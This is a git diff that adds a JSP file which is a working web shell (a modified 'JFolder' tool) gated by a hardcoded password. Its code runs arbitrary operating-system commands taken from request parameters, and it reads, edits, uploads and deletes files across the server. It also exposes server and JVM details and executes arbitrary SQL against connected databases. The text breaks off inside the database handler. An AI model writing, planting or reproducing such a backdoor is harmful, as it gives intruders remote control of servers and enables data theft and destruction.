diff --git a/jsp/520.jsp b/jsp/520.jsp
new file mode 100644
index 0000000..2d3e895
--- /dev/null
+++ b/jsp/520.jsp
@@ -0,0 +1,1811 @@
+<%@ page contentType="text/html; charset=GBK" %>
+<%@ page import="java.io.*"%>
+<%@ page import="java.util.Map"%>
+<%@ page import="java.util.HashMap"%>
+<%@ page import="java.nio.charset.Charset"%>
+<%@ page import="java.util.regex.*"%>
+<%@ page import="java.sql.*"%>
+<%!
+private String _password = "8013520";
+private String _encodeType = "GB2312";
+private int _sessionOutTime = 20;
+private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"};
+private Connection _dbConnection = null;
+private Statement _dbStatement = null;
+private String _url = null;
+
+public boolean validate(String password) {
+ if (password.equals(_password)) {
+ return true;
+ } else {
+ return false;
+ }
+}
+
+public String HTMLEncode(String str) {
+ str = str.replaceAll(" ", " ");
+ str = str.replaceAll("<", "<");
+ str = str.replaceAll(">", ">");
+ str = str.replaceAll("\r\n", " ");
+
+ return str;
+}
+
+public String Unicode2GB(String str) {
+ String sRet = null;
+
+ try {
+ sRet = new String(str.getBytes("ISO8859_1"), _encodeType);
+ } catch (Exception e) {
+ sRet = str;
+ }
+
+ return sRet;
+}
+
+public String exeCmd(String cmd) {
+ Runtime runtime = Runtime.getRuntime();
+ Process proc = null;
+ String retStr = "";
+ InputStreamReader insReader = null;
+ char[] tmpBuffer = new char[1024];
+ int nRet = 0;
+
+ try {
+ proc = runtime.exec(cmd);
+ insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+
+ while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+ retStr += new String(tmpBuffer, 0, nRet);
+ }
+
+ insReader.close();
+ retStr = HTMLEncode(retStr);
+ } catch (Exception e) {
+ retStr = "bad command \"" + cmd + "\" ";
+ } finally {
+ return retStr;
+ }
+}
+
+public String pathConvert(String path) {
+ String sRet = path.replace('\\', '/');
+ File file = new File(path);
+
+ if (file.getParent() != null) {
+ if (file.isDirectory()) {
+ if (! sRet.endsWith("/"))
+ sRet += "/";
+ }
+ } else {
+ if (! sRet.endsWith("/"))
+ sRet += "/";
+ }
+
+ return sRet;
+}
+
+public String strCut(String str, int len) {
+ String sRet;
+
+ len -= 3;
+
+ if (str.getBytes().length <= len) {
+ sRet = str;
+ } else {
+ try {
+ sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
+ } catch (Exception e) {
+ sRet = str;
+ }
+ }
+
+ return sRet;
+}
+
+public String listFiles(String path, String curUri) {
+ File[] files = null;
+ File curFile = null;
+ String sRet = null;
+ int n = 0;
+ boolean isRoot = path.equals("");
+
+ path = pathConvert(path);
+
+ try {
+ if (isRoot) {
+ files = File.listRoots();
+ } else {
+ try {
+ curFile = new File(path);
+ String[] sFiles = curFile.list();
+ files = new File[sFiles.length];
+
+ for (n = 0; n < sFiles.length; n ++) {
+ files[n] = new File(path + sFiles[n]);
+ }
+ } catch (Exception e) {
+ sRet = "bad path \"" + path + "\" ";
+ }
+ }
+
+ if (sRet == null) {
+ sRet = "\n";
+ sRet += "\n";
+ sRet += "
\n";
+ sRet += " \n";
+
+ sRet += " \n";
+ sRet += "
\n";
+ }
+ } catch (SecurityException e) {
+ sRet = "security violation, no privilege. ";
+ }
+
+ return sRet;
+}
+
+public boolean isTextFile(String extName) {
+ int i;
+ boolean bRet = false;
+
+ if (! extName.equals("")) {
+ for (i = 0; i < _textFileTypes.length; i ++) {
+ if (extName.equals(_textFileTypes[i])) {
+ bRet = true;
+ break;
+ }
+ }
+ } else {
+ bRet = true;
+ }
+
+ return bRet;
+}
+
+public String getExtName(String fileName) {
+ String sRet = "";
+ int nLastDotPos;
+
+ fileName = pathConvert(fileName);
+
+ nLastDotPos = fileName.lastIndexOf(".");
+
+ if (nLastDotPos == -1) {
+ sRet = "";
+ } else {
+ sRet = fileName.substring(nLastDotPos + 1);
+ }
+
+ return sRet;
+}
+
+public String browseFile(String path) {
+ String sRet = "";
+ File file = null;
+ FileReader fileReader = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path);
+ fileReader = new FileReader(file);
+ String fileString = "";
+ char[] chBuffer = new char[1024];
+ int ret;
+
+ sRet = "\n";
+
+ } catch (IOException e) {
+ sRet += "\n";
+ }
+
+ return sRet;
+}
+
+public String openFile(String path, String curUri) {
+ String sRet = "";
+ boolean canOpen = false;
+ int nLastDotPos = path.lastIndexOf(".");
+ String extName = "";
+ String fileString = null;
+ File curFile = null;
+
+ path = pathConvert(path);
+
+ if (nLastDotPos == -1) {
+ canOpen = true;
+ } else {
+ extName = path.substring(nLastDotPos + 1);
+ canOpen = isTextFile(extName);
+ }
+
+ if (canOpen) {
+ try {
+ fileString = "";
+ curFile = new File(path);
+ FileReader fileReader = new FileReader(curFile);
+ char[] chBuffer = new char[1024];
+ int nRet;
+
+ while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
+ fileString += new String(chBuffer, 0, nRet);
+ }
+
+ fileReader.close();
+ } catch (IOException e) {
+ fileString = null;
+ sRet = "不能打开文件\"" + path + "\" ";
+ } catch (SecurityException e) {
+ fileString = null;
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+ } else {
+ sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode ";
+ }
+
+ if (fileString != null) {
+ sRet += "\n";
+ sRet += "\n";
+ sRet += " \n";
+ sRet += "
\n";
+ }
+
+ return sRet;
+}
+
+public String saveFile(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path);
+
+ if (! file.canWrite()) {
+ sRet = "文件不可写 ";
+ } else {
+ FileWriter fileWriter = new FileWriter(file);
+ fileWriter.write(fileContent);
+
+ fileWriter.close();
+ sRet = "文件保存成功,正在返回,请稍候……\n";
+ sRet += " \n";
+ }
+ } catch (IOException e) {
+ sRet = "保存文件失败 ";
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+
+ return sRet;
+}
+
+public String createFolder(String path, String curUri, String folderName) {
+ String sRet = "";
+ File folder = null;
+
+ path = pathConvert(path);
+
+ try {
+ folder = new File(path + folderName);
+
+ if (folder.exists() && folder.isDirectory()) {
+ sRet = "\"" + path + folderName + "\"目录已经存在 ";
+ } else {
+ if (folder.mkdir()) {
+ sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n";
+ sRet += " ";
+ } else {
+ sRet = "创建目录\"" + folderName + "\"失败 ";
+ }
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+
+ return sRet;
+}
+
+public String createFile(String path, String curUri, String fileName) {
+ String sRet = "";
+ File file = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path + fileName);
+
+ if (file.createNewFile()) {
+ sRet = " ";
+ } else {
+ sRet = "\"" + path + fileName + "\"文件已经存在 ";
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ } catch (IOException e) {
+ sRet = "创建文件\"" + path + fileName + "\"失败 ";
+ }
+
+ return sRet;
+}
+
+public String deleteFile(String path, String curUri, String[] files2Delete) {
+ String sRet = "";
+ File tmpFile = null;
+
+ try {
+ for (int i = 0; i < files2Delete.length; i ++) {
+ tmpFile = new File(files2Delete[i]);
+ if (! tmpFile.delete()) {
+ sRet += "删除\"" + files2Delete[i] + "\"失败 \n";
+ }
+ }
+
+ if (sRet.equals("")) {
+ sRet = "删除成功,正在返回,请稍候……\n";
+ sRet += " ";
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 \n";
+ }
+
+ return sRet;
+}
+
+public String saveAs(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+ FileWriter fileWriter = null;
+
+ try {
+ file = new File(path);
+
+ if (file.createNewFile()) {
+ fileWriter = new FileWriter(file);
+ fileWriter.write(fileContent);
+ fileWriter.close();
+
+ sRet = " ";
+ } else {
+ sRet = "文件\"" + path + "\"已经存在 ";
+ }
+ } catch (IOException e) {
+ sRet = "创建文件\"" + path + "\"失败 ";
+ }
+
+ return sRet;
+}
+
+
+public String uploadFile(ServletRequest request, String path, String curUri) {
+ String sRet = "";
+ File file = null;
+ InputStream in = null;
+
+ path = pathConvert(path);
+
+ try {
+ in = request.getInputStream();
+
+ byte[] inBytes = new byte[request.getContentLength()];
+ int nBytes;
+ int start = 0;
+ int end = 0;
+ int size = 1024;
+ String token = null;
+ String filePath = null;
+
+ //
+ // 把输入流读入一个字节数组
+ //
+ while ((nBytes = in.read(inBytes, start, size)) != -1) {
+ start += nBytes;
+ }
+
+ in.close();
+ //
+ // 从字节数组中得到文件分隔符号
+ //
+ int i = 0;
+ byte[] seperator;
+
+ while (inBytes[i] != 13) {
+ i ++;
+ }
+
+ seperator = new byte[i];
+
+ for (i = 0; i < seperator.length; i ++) {
+ seperator[i] = inBytes[i];
+ }
+
+ //
+ // 得到Header部分
+ //
+ String dataHeader = null;
+ i += 3;
+ start = i;
+ while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
+ i ++;
+ }
+ end = i - 1;
+ dataHeader = new String(inBytes, start, end - start + 1);
+
+ //
+ // 得到文件名
+ //
+ token = "filename=\"";
+ start = dataHeader.indexOf(token) + token.length();
+ token = "\"";
+ end = dataHeader.indexOf(token, start) - 1;
+ filePath = dataHeader.substring(start, end + 1);
+ filePath = pathConvert(filePath);
+ String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
+
+ //
+ // 得到文件内容开始位置
+ //
+ i += 4;
+ start = i;
+
+ /*
+ boolean found = true;
+ byte[] tmp = new byte[seperator.length];
+ while (i <= inBytes.length - 1 - seperator.length) {
+
+ for (int j = i; j < i + seperator.length; j ++) {
+ if (seperator[j - i] != inBytes[j]) {
+ found = false;
+ break;
+ } else
+ tmp[j - i] = inBytes[j];
+ }
+
+ if (found)
+ break;
+
+ i ++;
+ }*/
+
+ //
+ // 偷懒的办法
+ //
+ end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
+
+ //
+ // 保存为文件
+ //
+ File newFile = new File(path + fileName);
+ newFile.createNewFile();
+ FileOutputStream out = new FileOutputStream(newFile);
+
+ //out.write(inBytes, start, end - start + 1);
+ out.write(inBytes, start, end - start + 1);
+ out.close();
+
+ sRet = "\n";
+ } catch (IOException e) {
+ sRet = "\n";
+ }
+
+ sRet += " ";
+ return sRet;
+}
+
+public boolean fileCopy(String srcPath, String dstPath) {
+ boolean bRet = true;
+
+ try {
+ FileInputStream in = new FileInputStream(new File(srcPath));
+ FileOutputStream out = new FileOutputStream(new File(dstPath));
+ byte[] buffer = new byte[1024];
+ int nBytes;
+
+
+ while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+ out.write(buffer, 0, nBytes);
+ }
+
+ in.close();
+ out.close();
+ } catch (IOException e) {
+ bRet = false;
+ }
+
+ return bRet;
+}
+
+public String getFileNameByPath(String path) {
+ String sRet = "";
+
+ path = pathConvert(path);
+
+ if (path.lastIndexOf("/") != -1) {
+ sRet = path.substring(path.lastIndexOf("/") + 1);
+ } else {
+ sRet = path;
+ }
+
+ return sRet;
+}
+
+public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) {
+ String sRet = "";
+ int i;
+
+ path = pathConvert(path);
+ dstPath = pathConvert(dstPath);
+
+ for (i = 0; i < files2Copy.length; i ++) {
+ if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) {
+ sRet += "文件\"" + files2Copy[i] + "\"复制失败 ";
+ }
+ }
+
+ if (sRet.equals("")) {
+ sRet = "文件复制成功,正在返回,请稍候……";
+ sRet += " ";
+ }
+
+ return sRet;
+}
+
+public boolean isFileName(String fileName) {
+ boolean bRet = false;
+
+ Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$");
+ Matcher m = p.matcher(fileName);
+
+ bRet = m.matches();
+
+ return bRet;
+}
+
+public String renameFile(String path, String curUri, String file2Rename, String newName) {
+ String sRet = "";
+
+ path = pathConvert(path);
+ file2Rename = pathConvert(file2Rename);
+
+ try {
+ File file = new File(file2Rename);
+
+ newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName;
+ File newFile = new File(newName);
+
+ if (! file.exists()) {
+ sRet = "文件\"" + file2Rename + "\"不存在 ";
+ } else {
+ file.renameTo(newFile);
+ sRet = "文件重命名成功,正在返回,请稍候……";
+ sRet += " ";
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题导致文件\"" + file2Rename + "\"复制失败 ";
+ }
+
+ return sRet;
+}
+
+public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) {
+ boolean bRet = true;
+ String driverName = "";
+
+ if (dbServer.equals(""))
+ dbServer = "localhost";
+
+ try {
+ if (dbType.equals("sqlserver")) {
+ driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
+ if (dbPort.equals(""))
+ dbPort = "1433";
+ _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+ } else if (dbType.equals("mysql")) {
+ driverName = "com.mysql.jdbc.Driver";
+ if (dbPort.equals(""))
+ dbPort = "3306";
+ _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+ } else if (dbType.equals("odbc")) {
+ driverName = "sun.jdbc.odbc.JdbcOdbcDriver";
+ _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword;
+ } else if (dbType.equals("oracle")) {
+ driverName = "oracle.jdbc.driver.OracleDriver";
+ _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName;
+ } else if (dbType.equals("db2")) {
+ driverName = "com.ibm.db2.jdbc.app.DB2Driver";
+ _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName;
+ }
+
+ Class.forName(driverName);
+ } catch (ClassNotFoundException e) {
+ bRet = false;
+ }
+
+ return bRet;
+}
+
+public boolean DBConnect(String User, String Password) {
+ boolean bRet = false;
+
+ if (_url != null) {
+ try {
+ _dbConnection = DriverManager.getConnection(_url, User, Password);
+ _dbStatement = _dbConnection.createStatement();
+ bRet = true;
+ } catch (SQLException e) {
+ bRet = false;
+ }
+ }
+
+ return bRet;
+}
+
+public String DBExecute(String sql) {
+ String sRet = "";
+
+ if (_dbConnection == null || _dbStatement == null) {
+ sRet = "数据库没有正常连接 ";
+ } else {
+ try {
+ if (sql.toLowerCase().substring(0, 6).equals("select")) {
+ ResultSet rs = _dbStatement.executeQuery(sql);
+ ResultSetMetaData rsmd = rs.getMetaData();
+ int colNum = rsmd.getColumnCount();
+ int colType;
+
+ sRet = "sql语句执行成功,返回结果 \n";
+ sRet += "\n";
+ sRet += " \n";
+ for (int i = 1; i <= colNum; i ++) {
+ sRet += " " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ") \n";
+ }
+ sRet += " \n";
+ while (rs.next()) {
+ sRet += " \n";
+ for (int i = 1; i <= colNum; i ++) {
+ colType = rsmd.getColumnType(i);
+
+ sRet += " ";
+ switch (colType) {
+ case Types.BIGINT:
+ sRet += rs.getLong(i);
+ break;
+
+ case Types.BIT:
+ sRet += rs.getBoolean(i);
+ break;
+
+ case Types.BOOLEAN:
+ sRet += rs.getBoolean(i);
+ break;
+
+ case Types.CHAR:
+ sRet += rs.getString(i);
+ break;
+
+ case Types.DATE:
+ sRet += rs.getDate(i).toString();
+ break;
+
+ case Types.DECIMAL:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.NUMERIC:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.REAL:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.DOUBLE:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.FLOAT:
+ sRet += rs.getFloat(i);
+ break;
+
+ case Types.INTEGER:
+ sRet += rs.getInt(i);
+ break;
+
+ case Types.TINYINT:
+ sRet += rs.getShort(i);
+ break;
+
+ case Types.VARCHAR:
+ sRet += rs.getString(i);
+ break;
+
+ case Types.TIME:
+ sRet += rs.getTime(i).toString();
+ break;
+
+ case Types.DATALINK:
+ sRet += rs.getTimestamp(i).toString();
+ break;
+ }
+ sRet += " \n";
+ }
+ sRet += " \n";
+ }
+ sRet += "
\n";
+
+ rs.close();
+ } else {
+ if (_dbStatement.execute(sql)) {
+ sRet = "sql语句执行成功";
+ } else {
+ sRet = "sql语句执行失败 ";
+ }
+ }
+ } catch (SQLException e) {
+ sRet = "sql语句执行失败 ";
+ }
+ }
+
+ return sRet;
+}
+
+public void DBRelease() {
+ try {
+ if (_dbStatement != null) {
+ _dbStatement.close();
+ _dbStatement = null;
+ }
+
+ if (_dbConnection != null) {
+ _dbConnection.close();
+ _dbConnection = null;
+ }
+ } catch (SQLException e) {
+
+ }
+}
+
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+class JshellConfig {
+ private String _jshellContent = null;
+ private String _path = null;
+
+ public JshellConfig(String path) throws JshellConfigException {
+ _path = path;
+ read();
+ }
+
+ private void read() throws JshellConfigException {
+ try {
+ FileReader jshell = new FileReader(new File(_path));
+ char[] buffer = new char[1024];
+ int nChars;
+ _jshellContent = "";
+
+ while ((nChars = jshell.read(buffer, 0, 1024)) != -1) {
+ _jshellContent += new String(buffer, 0, nChars);
+ }
+
+ jshell.close();
+ } catch (IOException e) {
+ throw new JshellConfigException("打开文件失败");
+ }
+ }
+
+ public void save() throws JshellConfigException {
+ FileWriter jshell = null;
+
+ try {
+ jshell = new FileWriter(new File(_path));
+ char[] buffer = _jshellContent.toCharArray();
+ int start = 0;
+ int size = 1024;
+
+ for (start = 0; start < buffer.length - 1 - size; start += size) {
+ jshell.write(buffer, start, size);
+ }
+
+ jshell.write(buffer, start, buffer.length - 1 - start);
+ } catch (IOException e) {
+ new JshellConfigException("写文件失败");
+ } finally {
+ try {
+ jshell.close();
+ } catch (IOException e) {
+
+ }
+ }
+ }
+
+ public void setPassword(String password) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\w+");
+ Matcher m = p.matcher(password);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("密码不能有除字母数字下划线以外的字符");
+ }
+
+ p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\"");
+ m = p.matcher(_jshellContent);
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private String _password = \"" + password + "\"");
+
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setEncodeType(String encodeType) throws JshellConfigException {
+ Pattern p = Pattern.compile("[A-Za-z0-9]+");
+ Matcher m = p.matcher(encodeType);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("编码格式只能是字母和数字的组合");
+ }
+
+ p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\"");
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\"");
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setSessionTime(String sessionTime) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\d+");
+ Matcher m = p.matcher(sessionTime);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("session超时时间只能填数字");
+ }
+
+ p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime);
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime);
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\w+");
+ Matcher m = null;
+ int i;
+ String fileTypes = "";
+ String tmpFileTypes = "";
+
+ for (i = 0; i < textFileTypes.length; i ++) {
+ m = p.matcher(textFileTypes[i]);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("扩展名只能是字母数字和下划线的组合");
+ }
+
+ if (i != textFileTypes.length - 1)
+ fileTypes += "\"" + textFileTypes[i] + "\"" + ", ";
+ else
+ fileTypes += "\"" + textFileTypes[i] + "\"";
+ }
+
+ for (i = 0; i < _textFileTypes.length; i ++) {
+ if (i != _textFileTypes.length - 1)
+ tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", ";
+ else
+ tmpFileTypes += "\"" + _textFileTypes[i] + "\"";
+ }
+
+ p = Pattern.compile(tmpFileTypes);
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序文件已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll(fileTypes);
+
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public String getContent() {
+ return HTMLEncode(_jshellContent);
+ }
+}
+
+class JshellConfigException extends Exception {
+ public JshellConfigException(String message) {
+ super(message);
+ }
+}
+%>
+
+
+JFolder 华夏猪头三修改版
+
+
+
+
+<%
+session.setMaxInactiveInterval(_sessionOutTime * 60);
+
+if (request.getParameter("password") == null && session.getAttribute("password") == null) {
+// show the login form
+//================================================================================================
+%>
+
+<%
+//================================================================================================
+// end of the login form
+} else {
+ String password = null;
+
+ if (session.getAttribute("password") == null) {
+ password = (String)request.getParameter("password");
+
+ if (validate(password) == false) {
+ out.println("哎呀,倒霉死啦!
");
+ out.close();
+ return;
+ }
+
+ session.setAttribute("password", password);
+ } else {
+ password = (String)session.getAttribute("password");
+ }
+
+ String action = null;
+
+
+ if (request.getParameter("action") == null)
+ action = "main";
+ else
+ action = (String)request.getParameter("action");
+
+ if (action.equals("exit")) {
+ session.removeAttribute("password");
+ response.sendRedirect(request.getRequestURI());
+ out.close();
+ return;
+ }
+
+// show the main menu
+//====================================================================================
+%>
+
+
+
+
+
+
+ 程序首页
+ 文件系统
+ 系统命令
+ 数据库
+ 程序配置
+ 关于程序
+ 退出程序
+
+
+
+
+
+
+<%
+//=====================================================================================
+// end of main menu
+
+ if (action.equals("main")) {
+// print the system info table
+//=======================================================================================
+%>
+
+
+ 服务器信息
+
+
+ 服务器名
+ <%=request.getServerName()%>
+
+
+ 服务器端口
+ <%=request.getServerPort()%>
+
+
+ 操作系统
+ <%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
+
+
+ 当前用户名
+ <%=System.getProperty("user.name")%>
+
+
+ 当前用户目录
+ <%=System.getProperty("user.home")%>
+
+
+ 当前用户工作目录
+ <%=System.getProperty("user.dir")%>
+
+
+ 程序相对路径
+ <%=request.getRequestURI()%>
+
+
+ 程序绝对路径
+ <%=request.getRealPath(request.getServletPath())%>
+
+
+ 网络协议
+ <%=request.getProtocol()%>
+
+
+ 服务器软件版本信息
+ <%=application.getServerInfo()%>
+
+
+ JDK版本
+ <%=System.getProperty("java.version")%>
+
+
+ JDK安装路径
+ <%=System.getProperty("java.home")%>
+
+
+ JAVA虚拟机版本
+ <%=System.getProperty("java.vm.specification.version")%>
+
+
+ JAVA虚拟机名
+ <%=System.getProperty("java.vm.name")%>
+
+
+ JAVA类路径
+ <%=System.getProperty("java.class.path")%>
+
+
+ JAVA载入库搜索路径
+ <%=System.getProperty("java.library.path")%>
+
+
+ JAVA临时目录
+ <%=System.getProperty("java.io.tmpdir")%>
+
+
+ JIT编译器名
+ <%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
+
+
+ 扩展目录路径
+ <%=System.getProperty("java.ext.dirs")%>
+
+
+ 客户端信息
+
+
+ 客户机地址
+ <%=request.getRemoteAddr()%>
+
+
+ 服务机器名
+ <%=request.getRemoteHost()%>
+
+
+ 用户名
+ <%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
+
+
+ 请求方式
+ <%=request.getScheme()%>
+
+
+ 应用安全套接字层
+ <%=request.isSecure() == true ? "是" : "否"%>
+
+
+<%
+//=======================================================================================
+// end of printing the system info table
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("filesystem")) {
+ String curPath = "";
+ String result = "";
+ String fsAction = "";
+
+ if (request.getParameter("curPath") == null) {
+ curPath = request.getRealPath(request.getServletPath());
+ curPath = pathConvert((new File(curPath)).getParent());
+ } else {
+ curPath = Unicode2GB((String)request.getParameter("curPath"));
+ }
+
+ if (request.getParameter("fsAction") == null) {
+ fsAction = "list";
+ } else {
+ fsAction = (String)request.getParameter("fsAction");
+ }
+
+ if (fsAction.equals("list"))
+ result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
+ else if (fsAction.equals("browse")) {
+ result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
+ result += browseFile(curPath);
+ }
+ else if (fsAction.equals("open"))
+ result = openFile(curPath, request.getRequestURI() + "?action=" + action);
+ else if (fsAction.equals("save")) {
+ if (request.getParameter("fileContent") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
+ result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+ }
+ } else if (fsAction.equals("createFolder")) {
+ if (request.getParameter("folderName") == null) {
+ result = "目录名不能为空 ";
+ } else {
+ String folderName = Unicode2GB(request.getParameter("folderName").trim());
+ if (folderName.equals("")) {
+ result = "目录名不能为空 ";
+ } else {
+ result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
+ }
+ }
+ } else if (fsAction.equals("createFile")) {
+ if (request.getParameter("fileName") == null) {
+ result = "文件名不能为空 ";
+ } else {
+ String fileName = Unicode2GB(request.getParameter("fileName").trim());
+ if (fileName.equals("")) {
+ result = "文件名不能为空 ";
+ } else {
+ result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
+ }
+ }
+ } else if (fsAction.equals("deleteFile")) {
+ if (request.getParameter("filesDelete") == null) {
+ result = "没有选择要删除的文件 ";
+ } else {
+ String[] files2Delete = (String[])request.getParameterValues("filesDelete");
+ if (files2Delete.length == 0) {
+ result = "没有选择要删除的文件 ";
+ } else {
+ for (int n = 0; n < files2Delete.length; n ++) {
+ files2Delete[n] = Unicode2GB(files2Delete[n]);
+ }
+ result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
+ }
+ }
+ } else if (fsAction.equals("saveAs")) {
+ if (request.getParameter("fileContent") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String fileContent = Unicode2GB(request.getParameter("fileContent"));
+ result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+ }
+ } else if (fsAction.equals("upload")) {
+ result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
+ } else if (fsAction.equals("copyto")) {
+ if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
+ result = "没有选择要复制的文件 ";
+ } else {
+ String[] files2Copy = request.getParameterValues("filesDelete");
+ String dstPath = request.getParameter("dstPath").trim();
+ if (files2Copy.length == 0) {
+ result = "没有选择要复制的文件 ";
+ } else if (dstPath.equals("")) {
+ result = "没有填写要复制到的目录路径 ";
+ } else {
+ for (int i = 0; i < files2Copy.length; i ++)
+ files2Copy[i] = Unicode2GB(files2Copy[i]);
+
+ result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
+ }
+ }
+ } else if (fsAction.equals("rename")) {
+ if (request.getParameter("fileRename") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String file2Rename = request.getParameter("fileRename").trim();
+ String newName = request.getParameter("newName").trim();
+ if (file2Rename.equals("")) {
+ result = "没有选择要重命名的文件 ";
+ } else if (newName.equals("")) {
+ result = "没有填写新文件名 ";
+ } else {
+ result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
+ }
+ }
+ }
+%>
+
+<%
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("command")) {
+ String cmd = "";
+ InputStream ins = null;
+ String result = "";
+
+ if (request.getParameter("command") != null) {
+ cmd = (String)request.getParameter("command");
+ result = exeCmd(cmd);
+ }
+// print the command form
+//========================================================================================
+%>
+
+
+
+ <%=result == "" ? " " : result%>
+
+
+<%
+//=========================================================================================
+// end of printing command form
+///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("database")) {
+ String dbAction = "";
+ String result = "";
+ String dbType = "";
+ String dbServer = "";
+ String dbPort = "";
+ String dbUsername = "";
+ String dbPassword = "";
+ String dbName = "";
+ String dbResult = "";
+ String sql = "";
+
+ if (request.getParameter("dbAction") == null) {
+ dbAction = "main";
+ } else {
+ dbAction = request.getParameter("dbAction").trim();
+ if (dbAction.equals(""))
+ dbAction = "main";
+ }
+
+ if (dbAction.equals("main")) {
+ result = " ";
+ } else if (dbAction.equals("dbConnect")) {
+ if (request.getParameter("dbType") == null ||
+ request.getParameter("dbServer") == null ||
+ request.getParameter("dbPort") == null ||
+ request.getParameter("dbUsername") == null ||
+ request.getParameter("dbPassword") == null ||
+ request.getParameter("dbName") == null) {
+ response.sendRedirect(request.getRequestURI() + "?action=" + action);
+ } else {
+ dbType = request.getParameter("dbType").trim();
+ dbServer = request.getParameter("dbServer").trim();
+ dbPort = request.getParameter("dbPort").trim();
+ dbUsername = request.getParameter("dbUsername").trim();
+ dbPassword = request.getParameter("dbPassword").trim();
+ dbName = request.getParameter("dbName").trim();
+
